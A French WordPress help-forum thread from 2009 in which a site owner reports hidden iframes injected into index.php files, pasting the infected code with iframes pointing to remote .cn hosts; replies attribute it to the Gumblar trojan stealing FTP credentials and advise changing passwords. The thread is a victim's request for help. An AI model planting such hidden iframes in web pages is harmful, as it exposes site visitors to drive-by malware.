- Statut : non résolu
- Ce sujet contient 7 réponses, 5 participants et a été mis à jour pour la dernière fois par el_fantome, le il y a 15 années.
-
AuteurMessages
-
15 juin 2009 à 7 h 14 min #471155
Bonjour,
Ma configuration WP actuelle
– Version de WordPress : 2.7.1
– Thème utilisé : cute-bubbles
– Plugins en place : akismet, category-icons, event-calendar, events-calendar, wp-pools.2.31 (sachant qu’il me semble que seul akismet soit activé)
– Nom de l’hebergeur : OVH
– Adresse du site : http://www.fardsetjupons.frProblème(s) rencontré(s) :
Bonjour à tous, depuis quelques jours, je rencontre un problème assez dérangeant sur le blog WordPress de ma chère et tendre, à savoir qu’un hacker/bot/chinois parvient à insérer du code HTML dans les pages nommées « index.php » (il s’en est même pris à un « index_old.html » ce qui me laisse fortement penser à un bot).Exemple de page ayant subit une injection :
Page index.php à la racine du répertoire www
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-
<iframe src="http://bigbestlite.cn:8080/index.php" width=116 height=183 style="visibility: hidden"></iframe>Page index.php du dossier wp-admin
<?php
/**
* Dashboard Administration Panel
*
* @package WordPress
* @subpackage Administration
*/
/** Load WordPress Bootstrap */
require_once('admin.php');
/** Load WordPress dashboard API */
require_once(ABSPATH . 'wp-admin/includes/dashboard.php');
wp_dashboard_setup();
wp_enqueue_script( 'dashboard' );
wp_enqueue_script( 'plugin-install' );
wp_enqueue_script( 'media-upload' );
wp_admin_css( 'dashboard' );
wp_admin_css( 'plugin-install' );
add_thickbox();
$title = __('Dashboard');
$parent_file = 'index.php';
require_once('admin-header.php');
$today = current_time('mysql', 1);
?>
<div class="wrap">
<?php screen_icon(); ?>
<h2><?php echo wp_specialchars( $title ); ?></h2>
<div id="dashboard-widgets-wrap">
<?php wp_dashboard(); ?>
<div class="clear">Page index.php du répertoire wp-content
<?php
// Silence is golden.
<iframe src="http://greatmixlot.cn:8080/ts/in.cgi?pepsi63" width=125 height=125 style="visibility: hidden"></ifra
<iframe src="http://bigbestlite.cn:8080/index.php" width=116 height=183 style="visibility: hidden"></iframe>On retrouve donc à chaque fois ces saloperies d’iframes cachées avec un site web chinois à la con qui ne m’inspire pas vraiment confiance :
<iframe src="http://bigbestlite.cn:8080/index.php" width=116 height=183 style="visibility: hidden"></iframe>
Quelqu’un aurait-il déjà été victime de cette faille ?
La dernière MAJ WordPress permet-elle de l’éviter ?
Comment cela a-t-il pu arriver ?On m’a parlé d’une éventuelle infection du serveur OVH lui-même mais ça me semble gros…
Merci par avance de votre aide !
15 juin 2009 à 10 h 40 min #676974Je me permet de up ce thread… Ce problème me pose vraiment beaucoup de soucis.
Si vous avez la moindre idée n’hésitez pas !16 juin 2009 à 19 h 17 min #676975Je up une dernière fois ce thread en espérant qu’au moins une personne pourra me répondre.
Depuis la dernière fois :J’ai mis à jour WordPress vers la version 2.8
J’ai supprimé tous les thèmes et plugins dont je ne me sers pas et il ne me reste plus qu’Akismet.
J’ai mis à jour mon phpmyvisitesEt ça fait la 4ème fois que cette personne malveillante me fout ces saloperies de morceaux de code HTML à la fin de chaque page dont le nom contient « index » ou « default »…
PITIE AIDEZ MOI JE DEVIENS FOU :fire::fire::fire::fire:
16 juin 2009 à 19 h 45 min #676976Je vais repasser l’information que j’ai eu sur un forum d’hébergeur il y a actuellement des virus qui se promène et qui attaque les principaux clients ftp. Donc l’hébergeur préconisait 1) de changer le mot de passe ftp sur le serveur, 2) désinfecter sa machine habituelle, 3) reparamétrer son client ftp
je ne dis pas que c’est cela mais c’est une piste à creuser
17 juin 2009 à 12 h 34 min #676977Oui c’est un trojan qui infecte en ce moment pas mal de Site et notemant des WP.
Gamblar et martuz.cn
Il copent les code FTP par trojan et injectent des iframe partout ou ils peuvent.
Le virus utilise ces logiciels pour vous infecter. Une fois infecter, il choppe des mots de passe qu’il utilise pour infecter des sites. Ensuite les sites ouvrent automatiquement de manière cachée un PDF verolé qui contamine les internautes. La boucle est bouclée : ce virus circule de particulier à site et de site à particulier.
Plus d’info :
– http://www.sur-la-toile.com/article-7436-L%92attaque-Gumblar-continue….html
– http://www.clubic.com/actualite-277286-gumblar-attaque-xss-prend-ampleur.html
– http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html17 juin 2009 à 12 h 48 min #676978La solution est de changer les pass FTP et de voir comment ils ont pu être copiés.
29 juillet 2009 à 11 h 37 min #676979Je suis touché. C’est particulièrement douloureux…
19 août 2009 à 22 h 48 min #676980Bonjour,
Une solution détaillée pour ce problème d’injection iframe:
-
AuteurMessages
- Vous devez être connecté pour répondre à ce sujet.